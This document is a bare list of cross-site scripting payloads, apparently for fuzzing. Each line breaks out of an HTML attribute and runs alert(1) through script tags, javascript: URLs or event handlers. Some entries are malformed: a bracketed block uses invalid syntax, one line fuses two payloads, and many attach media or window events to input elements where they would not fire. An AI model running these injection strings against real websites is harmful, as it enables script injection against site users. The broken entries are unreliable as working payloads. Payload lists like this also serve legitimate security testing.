'"><img src=1 onerror=alert(1)>
'"><svg onload=alert(1)>
'"><input type="image" src=x onerror=alert(1)>
'"><script>alert(1)</script>
'"><iframe src="javascript:alert(1)">
'"><link rel="stylesheet" href="javascript:alert(1)">
'"><meta http-equiv="refresh" content="0;url=javascript:alert(1)">
'"><style>@import'javascript:alert(1)';</style>
'"><a href="javascript:alert(1)">click</a>
'"><body onload=alert(1)>
'"><b onmouseover=alert(1)>
'"><button onclick=alert(1)>
'"><video src="x" onerror=alert(1)>
'"><audio src="x" onerror=alert(1)>
'"><form action="javascript:alert(1)">
'"><svg><desc>alert(1)</desc></svg>
'"><object data="javascript:alert(1)">
'"><textarea onfocus=alert(1)>X</textarea>
'"><input onblur=alert(1)>
'"><input onfocus=alert(1)>
'"><input oninput=alert(1)>
'"><input onkeypress=alert(1)>
'"><input onkeyup=alert(1)>
'"><input onkeydown=alert(1)>
'"><input onchange=alert(1)>
'"><input onmouseenter=alert(1)>
'"><input onmouseleave=alert(1)>
'"><input onmouseover=alert(1)>
'"><input onmouseout=alert(1)>
'"><input onclick=alert(1)>
'"><input ondblclick=alert(1)>
'"><input oncontextmenu=alert(1)>
'"><input onmousedown=alert(1)>
'"><input onmouseup=alert(1)>
'"><input onresize=alert(1)>
'"><input onscroll=alert(1)>
'"><input onwheel=alert(1)>
'"><input ondrag=alert(1)>
'"><input ondragend=alert(1)>
'"><input ondragenter=alert(1)>
'"><input ondragexit=alert(1)>
'"><input ondragleave=alert(1)>
'"><input ondragover=alert(1)>
'"><input ondragstart=alert(1)>
'"><input ondrop=alert(1)>
'"><input oncopy=alert(1)>
'"><input oncut=alert(1)>
'"><input onpaste=alert(1)>
'"><input onabort=alert(1)>
'"><input oncanplay=alert(1)>
'"><input oncanplaythrough=alert(1)>
'"><input oncuechange=alert(1)>
'"><input ondurationchange=alert(1)>
'"><input onemptied=alert(1)>
'"><input onended=alert(1)>
'"><input onloadeddata=alert(1)>
'"><input onloadedmetadata=alert(1)>
'"><input onloadstart=alert(1)>
'"><input onpause=alert(1)>
'"><input onplay=alert(1)>
'"><input onplaying=alert(1)>
'"><input onprogress=alert(1)>
'"><input onratechange=alert(1)>
'"><input onseeked=alert(1)>
'"><input onseeking=alert(1)>
'"><input onstalled=alert(1)>
'"><input onsuspend=alert(1)>
'"><input ontimeupdate=alert(1)>
'"><input onvolumechange=alert(1)>
'"><input onwaiting=alert(1)>
'"><input onshow=alert(1)>
'"><input onselect=alert(1)>
'"><input ontoggle=alert(1)>
'"><input onactivate=alert(1)>"><script>{alert(1)}</script>
"><svg[onload=alert(1)]
"><img[src=1 onerror=alert(1)]
"><iframe[src=javascript:alert(1)]
"><link[rel=stylesheet href=javascript:alert(1)]
"><meta[http-equiv=refresh content=0;url=javascript:alert(1)]
"><style>{@import'javascript:alert(1)'}</style>
"><a[href=javascript:alert(1)]click</a>
"><body[onload=alert(1)]
"><b[onmouseover=alert(1)]
"><button[onclick=alert(1)]
"><video[src=x onerror=alert(1)]
"><audio[src=x onerror=alert(1)]
"><form[action=javascript:alert(1)]
"><textarea[onfocus=alert(1)]X</textarea>
"><input[onblur=alert(1)]
"><input[onfocus=alert(1)]
"><input[oninput=alert(1)]
"><input[onkeypress=alert(1)]
"><input[onkeyup=alert(1)]
"><input[onkeydown=alert(1)]
"><input[onchange=alert(1)]
"><input[onmouseenter=alert(1)]
"><input[onmouseleave=alert(1)]
"><input[onmouseover=alert(1)]
"><input[onmouseout=alert(1)]
"><input[onclick=alert(1)]
"><input[ondblclick=alert(1)]
"><input[oncontextmenu=alert(1)]
"><input[onmousedown=alert(1)]
"><input[onmouseup=alert(1)]
"><input[onresize=alert(1)]
"><input[onscroll=alert(1)]
"><input[onwheel=alert(1)]
"><input[ondrag=alert(1)]
"><input[ondragend=alert(1)]
"><input[ondragenter=alert(1)]
"><input[ondragexit=alert(1)]
"><input[ondragleave=alert(1)]
"><input[ondragover=alert(1)]
"><input[ondragstart=alert(1)]
"><input[ondrop=alert(1)]
"><input[oncopy=alert(1)]
"><input[oncut=alert(1)]
"><input[onpaste=alert(1)]
"><input[onabort=alert(1)]
"><input[oncanplay=alert(1)]
"><input[oncanplaythrough=alert(1)]
"><input[oncuechange=alert(1)]
"><input[ondurationchange=alert(1)]
"><input[onemptied=alert(1)]
"><input[onended=alert(1)]
"><input[onloadeddata=alert(1)]
"><input[onloadedmetadata=alert(1)]
"><input[onloadstart=alert(1)]
"><input[onpause=alert(1)]
"><input[onplay=alert(1)]
"><input[onplaying=alert(1)]
"><input[onprogress=alert(1)]
"><input[onratechange=alert(1)]
"><input[onseeked=alert(1)]
"><input[onseeking=alert(1)]
"><input[onstalled=alert(1)]
"><input[onsuspend=alert(1)]
"><input[ontimeupdate=alert(1)]
"><input[onvolumechange=alert(1)]
"><input[onwaiting=alert(1)]
"><input[onshow=alert(1)]
"><input[onselect=alert(1)]
"><input[ontoggle=alert(1)]
"><input[onactivate=alert(1)]
"><input[ondeactivate=alert(1)]
"><input[onfocusin=alert(1)]
"><input[onfocusout=alert(1)]
"><input[onbeforeprint=alert(1)]
"><input[onafterprint=alert(1)]
"><input[onbeforeunload=alert(1)]
"><input[onhashchange=alert(1)]
"><input[onlanguagechange=alert(1)]
"><input[onmessage=alert(1)]
"><input[onoffline=alert(1)]
"><input[ononline=alert(1)]
"><input[onpagehide=alert(1)]
"><input[onpageshow=alert(1)]
"><input[onpopstate=alert(1)]
"><input[onstorage=alert(1)]
"><input[onunload=alert(1)]
"><script>alert(1)</script>
"><svg onload=alert(1)>
"><img src=1 onerror=alert(1)>
"><iframe src=javascript:alert(1)>
"><link rel=stylesheet href=javascript:alert(1)>
"><meta http-equiv=refresh content=0;url=javascript:alert(1)>
"><style>@import'javascript:alert(1)';</style>
"><a href=javascript:alert(1)>click</a>
"><body onload=alert(1)>
"><b onmouseover=alert(1)>
"><button onclick=alert(1)>

'"><input ondeactivate=alert(1)>
'"><input onfocusin=alert(1)>
'"><input onfocusout=alert(1)>
'"><input onbeforeprint=alert(1)>
'"><input onafterprint=alert(1)>
'"><input onbeforeunload=alert(1)>
'"><input onhashchange=alert(1)>
'"><input onlanguagechange=alert(1)>
'"><input onmessage=alert(1)>
'"><input onoffline=alert(1)>
'"><input ononline=alert(1)>
'"><input onpagehide=alert(1)>
'"><input onpageshow=alert(1)>
'"><input onpopstate=alert(1)>
'"><input onstorage=alert(1)>
'"><input onunload=alert(1)>
